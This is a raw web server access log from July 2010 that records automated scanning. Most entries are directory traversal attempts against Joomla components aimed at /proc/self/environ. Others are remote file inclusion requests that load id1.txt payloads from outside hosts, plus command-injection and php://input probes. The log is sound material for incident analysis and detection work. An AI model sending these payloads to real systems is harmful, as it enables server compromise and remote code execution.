83.149.110.213 - - [27/Jul/2010:17:17:39 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
92.43.201.28 - - [27/Jul/2010:17:20:03 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
81.208.34.38 - - [27/Jul/2010:17:20:25 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=http://www.projectmoneygenerator.com/css/us/id1.txt???? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
81.208.34.38 - - [27/Jul/2010:17:20:25 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=http://www.projectmoneygenerator.com/css/us/id1.txt???? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
81.208.34.38 - - [27/Jul/2010:17:20:25 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=http://www.projectmoneygenerator.com/css/us/id1.txt???? HTTP/1.1" 404 312 "-" "Mozilla/5.0"
92.43.201.28 - - [27/Jul/2010:17:20:29 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:17:20:42 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:17:22:50 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:17:22:53 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:17:22:56 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:17:23:11 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:17:23:11 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:17:23:29 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
76.242.100.234 - - [27/Jul/2010:17:24:29 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
83.149.110.213 - - [27/Jul/2010:17:24:33 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:17:24:33 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:17:24:33 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
76.242.100.234 - - [27/Jul/2010:17:25:29 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:17:25:45 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
92.43.201.28 - - [27/Jul/2010:17:25:58 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:17:25:59 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:17:25:59 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
76.242.100.234 - - [27/Jul/2010:17:26:11 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:17:26:11 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
92.43.201.28 - - [27/Jul/2010:17:26:14 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:17:26:18 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:17:26:18 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
76.242.100.234 - - [27/Jul/2010:17:26:54 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:17:26:59 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
72.37.150.18 - - [27/Jul/2010:17:27:09 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=http://necessary.juan.or.kr//necessary/public_html/id1.txt?? HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
72.37.150.18 - - [27/Jul/2010:17:27:09 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=http://necessary.juan.or.kr//necessary/public_html/id1.txt?? HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
72.37.150.18 - - [27/Jul/2010:17:27:10 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=http://necessary.juan.or.kr//necessary/public_html/id1.txt?? HTTP/1.1" 404 312 "-" "MaMa CaSpEr"
72.37.150.18 - - [27/Jul/2010:17:27:10 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
72.37.150.18 - - [27/Jul/2010:17:27:10 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
72.37.150.18 - - [27/Jul/2010:17:27:10 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 312 "-" "MaMa CaSpEr"
76.242.100.234 - - [27/Jul/2010:17:28:18 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:17:28:18 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
217.16.18.219 - - [27/Jul/2010:17:31:16 +0200] "GET /index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
174.123.133.162 - - [27/Jul/2010:17:32:44 +0200] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://jaxbba.com/id1.txt?? HTTP/1.1" 404 311 "-" "Mozilla/5.0"
174.123.133.162 - - [27/Jul/2010:17:32:45 +0200] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://jaxbba.com/id1.txt?? HTTP/1.1" 404 316 "-" "Mozilla/5.0"
174.123.133.162 - - [27/Jul/2010:17:32:45 +0200] "GET /logs/error_log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://jaxbba.com/id1.txt?? HTTP/1.1" 404 328 "-" "Mozilla/5.0"
174.123.133.162 - - [27/Jul/2010:17:32:46 +0200] "GET /logs/access_log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://jaxbba.com/id1.txt?? HTTP/1.1" 404 329 "-" "Mozilla/5.0"
174.123.133.162 - - [27/Jul/2010:17:32:52 +0200] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://jaxbba.com/id1.txt?? HTTP/1.1" 404 311 "-" "Mozilla/5.0"
174.123.133.162 - - [27/Jul/2010:17:32:52 +0200] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://jaxbba.com/id1.txt?? HTTP/1.1" 404 316 "-" "Mozilla/5.0"
174.123.133.162 - - [27/Jul/2010:17:32:53 +0200] "GET /logs/error_log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://jaxbba.com/id1.txt?? HTTP/1.1" 404 328 "-" "Mozilla/5.0"
174.123.133.162 - - [27/Jul/2010:17:32:55 +0200] "GET /logs/access_log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://jaxbba.com/id1.txt?? HTTP/1.1" 404 329 "-" "Mozilla/5.0"
76.242.100.234 - - [27/Jul/2010:17:35:05 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:17:35:05 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:17:35:06 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
174.123.133.162 - - [27/Jul/2010:17:40:51 +0200] "GET /logs/access_log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://jaxbba.com/id1.txt?? HTTP/1.1" 404 327 "-" "Mozilla/5.0"
174.123.133.162 - - [27/Jul/2010:17:40:51 +0200] "GET /logs/error_log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://jaxbba.com/id1.txt?? HTTP/1.1" 404 326 "-" "Mozilla/5.0"
174.123.133.162 - - [27/Jul/2010:17:41:16 +0200] "GET /logs/access_log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://jaxbba.com/id1.txt?? HTTP/1.1" 404 327 "-" "Mozilla/5.0"
94.23.215.207 - - [27/Jul/2010:18:11:43 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:18:11:43 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:18:11:46 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:18:11:46 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
92.43.201.28 - - [27/Jul/2010:18:17:00 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:18:17:00 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
217.16.18.219 - - [27/Jul/2010:18:17:13 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:18:17:13 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:18:17:21 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:18:17:27 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:18:17:27 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:18:17:43 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:18:18:58 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:18:18:58 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:18:18:59 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
92.43.201.28 - - [27/Jul/2010:18:19:41 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:18:19:42 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
217.16.18.219 - - [27/Jul/2010:18:20:40 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:18:20:40 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:18:20:40 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:18:21:24 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
188.165.217.175 - - [27/Jul/2010:18:29:37 +0200] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
188.165.217.175 - - [27/Jul/2010:18:29:37 +0200] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
217.16.18.219 - - [27/Jul/2010:18:54:01 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:18:54:02 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:18:54:02 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:19:10:44 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:19:10:44 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
220.125.208.51 - - [27/Jul/2010:19:11:18 +0200] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
220.125.208.51 - - [27/Jul/2010:19:11:19 +0200] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
220.125.208.51 - - [27/Jul/2010:19:11:19 +0200] "GET //index.php?option=com_gcalendar&controller=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
220.125.208.51 - - [27/Jul/2010:19:11:20 +0200] "POST //index.php?option=com_gcalendar&controller=php://input HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
217.16.18.219 - - [27/Jul/2010:19:11:30 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:19:11:30 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:19:13:13 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:19:13:13 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:19:13:14 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:19:13:24 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:19:13:24 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:19:13:25 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
209.97.216.92 - - [27/Jul/2010:19:21:03 +0200] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
146.48.126.231 - - [27/Jul/2010:19:21:20 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "L.webis/0.78 (http://webalgo.iit.cnr.it/index.php?pg=lwebis)"
146.48.126.231 - - [27/Jul/2010:19:21:23 +0200] "GET / HTTP/1.1" 200 559 "-" "L.webis/0.78 (http://webalgo.iit.cnr.it/index.php?pg=lwebis)"
217.16.18.219 - - [27/Jul/2010:19:27:16 +0200] "GET /logs/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:19:27:16 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:19:28:06 +0200] "GET /logs/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:19:28:07 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:19:28:08 +0200] "GET /logs/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:19:28:08 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
222.124.193.12 - - [27/Jul/2010:19:38:47 +0200] "GET //?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 665 "-" "libwww-perl/5.805"
222.124.193.12 - - [27/Jul/2010:19:39:45 +0200] "GET //?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 665 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:19:46:29 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:19:46:29 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:19:46:29 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
64.150.180.136 - - [27/Jul/2010:19:46:47 +0200] "GET /logs/access_log/?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.810"
64.150.180.136 - - [27/Jul/2010:19:46:47 +0200] "GET /?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.810"
64.150.180.136 - - [27/Jul/2010:19:46:47 +0200] "GET /logs/access_log/?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.810"
64.150.180.136 - - [27/Jul/2010:19:46:47 +0200] "GET /logs/?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.810"
64.150.180.136 - - [27/Jul/2010:19:46:47 +0200] "GET /?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.810"
64.150.180.136 - - [27/Jul/2010:19:46:48 +0200] "GET /logs/?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.810"
195.168.25.206 - - [27/Jul/2010:19:47:31 +0200] "GET /logs/access_log/?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
195.168.25.206 - - [27/Jul/2010:19:47:31 +0200] "GET /logs/access_log/?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
195.168.25.206 - - [27/Jul/2010:19:47:31 +0200] "GET /?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
195.168.25.206 - - [27/Jul/2010:19:47:31 +0200] "GET /logs/?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.805"
195.168.25.206 - - [27/Jul/2010:19:47:34 +0200] "GET /?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
195.168.25.206 - - [27/Jul/2010:19:47:34 +0200] "GET /logs/?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.805"
41.78.28.104 - - [27/Jul/2010:19:48:47 +0200] "GET /logs/error_log//pingserver.php HTTP/1.1" 404 316 "-" "libwww-perl/5.808"
41.78.28.104 - - [27/Jul/2010:19:48:48 +0200] "GET //pingserver.php HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
41.78.28.104 - - [27/Jul/2010:19:48:48 +0200] "GET /logs//pingserver.php HTTP/1.1" 404 306 "-" "libwww-perl/5.808"
41.78.28.104 - - [27/Jul/2010:19:48:49 +0200] "GET /logs/error_log//pingserver.php HTTP/1.1" 404 316 "-" "libwww-perl/5.808"
41.78.28.104 - - [27/Jul/2010:19:48:50 +0200] "GET //pingserver.php HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
41.78.28.104 - - [27/Jul/2010:19:49:03 +0200] "GET /logs//pingserver.php HTTP/1.1" 404 306 "-" "libwww-perl/5.808"
41.78.28.104 - - [27/Jul/2010:19:49:25 +0200] "GET /logs/error_log//pingserver.php HTTP/1.1" 404 316 "-" "libwww-perl/5.808"
41.78.28.104 - - [27/Jul/2010:19:49:27 +0200] "GET //pingserver.php HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
41.78.28.104 - - [27/Jul/2010:19:49:29 +0200] "GET /logs//pingserver.php HTTP/1.1" 404 306 "-" "libwww-perl/5.808"
87.98.217.83 - - [27/Jul/2010:20:03:29 +0200] "GET /logs//index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:20:03:29 +0200] "GET //index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
67.218.116.170 - - [27/Jul/2010:20:03:45 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
173.236.43.226 - - [27/Jul/2010:20:04:34 +0200] "GET //index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
173.236.43.226 - - [27/Jul/2010:20:08:07 +0200] "GET /logs/access_log//index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.834"
173.236.43.226 - - [27/Jul/2010:20:08:11 +0200] "GET //index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
173.236.43.226 - - [27/Jul/2010:20:08:11 +0200] "GET /logs//index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.834"
67.195.114.225 - - [27/Jul/2010:20:09:00 +0200] "GET /robots.txt HTTP/1.0" 404 296 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.114.225 - - [27/Jul/2010:20:09:01 +0200] "GET /?C=N;O=A HTTP/1.0" 200 559 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
94.23.215.207 - - [27/Jul/2010:20:10:31 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:20:10:31 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:20:10:31 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:20:10:31 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
